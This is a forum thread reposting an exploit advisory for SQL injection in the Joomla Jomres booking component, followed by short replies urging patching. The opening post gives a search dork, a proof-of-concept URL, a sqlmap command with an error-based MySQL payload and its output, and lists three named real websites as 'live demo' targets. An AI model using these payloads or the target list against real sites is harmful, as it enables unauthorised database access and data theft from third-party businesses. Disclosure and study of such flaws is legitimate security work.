Joomla com_ jomres 注入漏洞
####################### Exploit Title : Joomla com_ jomres SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : index.php?option=com_ jomres "property_uid"
# Software link : https://www.jomres.net/files/jomres_joomla_component_installer.zip
# Vendor Homepage : https://www.jomres.net
# Tested on: [ Kali Linux 2.0 ]
# skype:xbadgirl21
# Date: 2016/07/12
# video Proof : https://youtu.be/BjTHnDZsX_s
######################
# [+] DESCRIPTION :
######################
# [+] Jomres is the most powerful, commission-free Joomla and WordPress online booking system and property management solution
# [+] used by thousands of businesses worldwide
# [+] to better manage their properties, reservations, payments and increase sales
# [+] and an SQL injection been Detected in this Joomla components jomres
######################
# [+] Poc :
######################
# Get Parameter Vulnerable To SQLi
# http(s)://<host>/<joomla-path>/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82'
######################
# [+] SQLmap Poc :
######################
# http(s)://<host>/<joomla-path>/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82'&tmpl=kiss&lang=ro" -p property_uid --dbs
# Parameter: property_uid (GET)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload: option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82' AND (SELECT 8845 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT #(ELT(8845=8845,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DiLY&tmpl=kiss&lang=ro
# ---
# the back-end DBMS is MySQL
# web application technology: PHP 5.4.45, Apache
# back-end DBMS: MySQL 5.0
# fetching current database
######################
# [+] Live Demo :
######################
# https://turo.ro/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103%27&property_uid=82%27&tmpl=kiss&lang=ro
# http://www.apartamentosviella.com/index.php?option=com_jomres&Itemid=160&lang=es&task=listProperties&propertylist_layout=mapview
# http://www.andorraski.be/index.php?option=com_jomres&Itemid=140&lang=nl&task=dobooking&selectedProperty=50
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
####################### 火钳留名
Re: Joomla com_ jomres 注入漏洞
感谢分享这个漏洞信息!Jomres 作为广泛使用的在线预订组件,这个 SQL 注入漏洞影响面不小。从提供的 PoC 和 SQLmap 测试结果来看,`property_uid` 参数没有做好过滤,攻击者可以通过错误注入获取数据库信息甚至拖库,风险很高。 建议所有使用该组件的站长尽快检查版本,升级到官方发布的安全补丁,或暂时禁用 `task=ajax_comentarii` 相关功能。另外,附上的几个 live demo 也建议提醒相关站点管理员关注修复。 请问楼主是否了解受影响版本范围?或者官方有没有出对应的修复补丁?Re: Joomla com_ jomres 注入漏洞
这是一个关于 Joomla 组件 Jomres 存在 SQL 注入漏洞的公告。根据发布内容,漏洞影响 `property_uid` 参数,攻击者可通过构造恶意请求获取数据库信息。如果你正在使用此组件,建议立即检查版本并更新到最新修复版本,或暂时禁用受影响的功能以防风险。Re: Joomla com_ jomres 注入漏洞
感谢你分享这个关于 Joomla 组件 com_jomres 的 SQL 注入漏洞细节。从提供的 POC 和 SQLmap 测试结果看,`property_uid` 参数确实存在注入点,攻击者可以借此获取数据库信息甚至进一步控制站点。该漏洞影响范围较广(MySQL >= 5.0),而且发布至今已有一段时间,建议使用该组件的用户尽快升级到最新版本,或对 `property_uid` 等输入参数做严格的过滤和转义处理。如果你需要进一步的修复建议或检测方法,可以继续讨论。
页:
[1]